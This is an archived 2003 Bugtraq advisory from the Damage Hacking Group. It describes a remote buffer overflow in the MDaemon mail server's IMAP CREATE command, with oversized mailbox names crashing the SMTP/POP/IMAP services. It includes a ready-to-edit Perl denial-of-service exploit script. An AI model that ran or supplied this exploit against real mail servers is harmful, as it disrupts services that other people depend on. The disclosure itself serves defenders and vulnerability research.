lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1548902631.20030426202701@mail.ru>
Date: Sat, 26 Apr 2003 20:27:01 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urityfocus.com
Subject: MDaemon SMTP/POP/IMAP server  =>v.6.7.5: IMAP buffer overflow


-----BEGIN PGP SIGNED MESSAGE-----

########################################################*
#       Damage Hacking Group security advisory
#                   www.dhgroup.org
########################################################*
#Product: MDaemon SMTP/POP/IMAP server =>v.6.7.5
#Authors: Alt-N Technologies [www.mdaemon.com]
#Vulnerability: remote buffer overflow in IMAP service
########################################################*

#Overview#-----------------------------------------------------#
- - From help-file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs
of any number of individual users and comes complete with a powerful
set of integrated tools for managing mail accounts and message
formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

#Problem#------------------------------------------------------#
Remote buffer overflow was found in MDaemon IMAP service.
A remote authorized user can execute arbitrary code on the
server with SYSTEM privileges.
⌠Create■ command for the IMAP server do not have proper bounds
checking, enabling a user to shutdown the service remotely. It
should be noted that a user account is required.
Remote authorized user may create new mailbox via IMAP service
with mailbox name more then 1Kb. In result, SMTP/POP/IMAP/LDAP
will crash, but WorldClient and WebAdmin will work normally.
For example:
0 CREATE AAAAAAA..[1kb]..AAA
When we send "0 CREATE AAAAAAA..[1kb]..AAA", Server creates
mailbox with name " AAAAA.. [202b..] AAA " and crash. Second time
we exact also we can not attack, because the server will consider,
that the mailbox  "AAAAA...AAA" is already created and will refuse
to process command. To bypass it, we must change any character
from the first 202 characters (for example, create " BAAAAAA... AA"
or "BBBBBBB...BB" instead of "AAAAA... AA■).
A vulnerability may use to execute arbitrary code (the remote user
can cause the EAX and EDI registers to be overwritten with
arbitrary data). All code will be run with system privileges (if
MDaemon installed like a system service).

#Exploit#------------------------------------------------------#

#!/usr/bin/perl
###############
#MDaemon SMTP/POP/IMAP server v.6.7.5
#Remote DoS exploit
##Edit this stuff:
$host = "imap_server";
$port = "143";
$login = "login";
$pass = "pass";
#Attention! If exploit doesn't
#work, change this:
$data = "A";
###############
use IO::Socket;
$num = "1000";
$buf .= $data x $num;
print "Connecting... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
print " OK\n"
print "Attacking... ";
print $socket "DHGroup Login $login $pass\n";
sleep(1);
print $socket "DHGroup CREATE $buf\n";
sleep(1);
print " OK\n";
print "Exiting... \n";
close($socket);
##//www.dhgroup.org//
#EOF

PS. thx to PIG_KILLER [www.securitylab.ru]

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPqtN/m4LIpseSJmPAQGxeAQAvDYdM2zMEdFqficvGBHrqTz+owhXEoUs
guRgs/vpHB1Mz4nLaISmtughGNJQg5H03YDzr7UqEasJ40GpxA7CDpzpcqlyO7KX
kOjeTsu6OF+hjmgIwTMJuKgGeXE5GWRS79IZb820w8DrDaIhMLCnu3fUBk+4EV7a
7oxsrKvseVA=
=WnA1
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ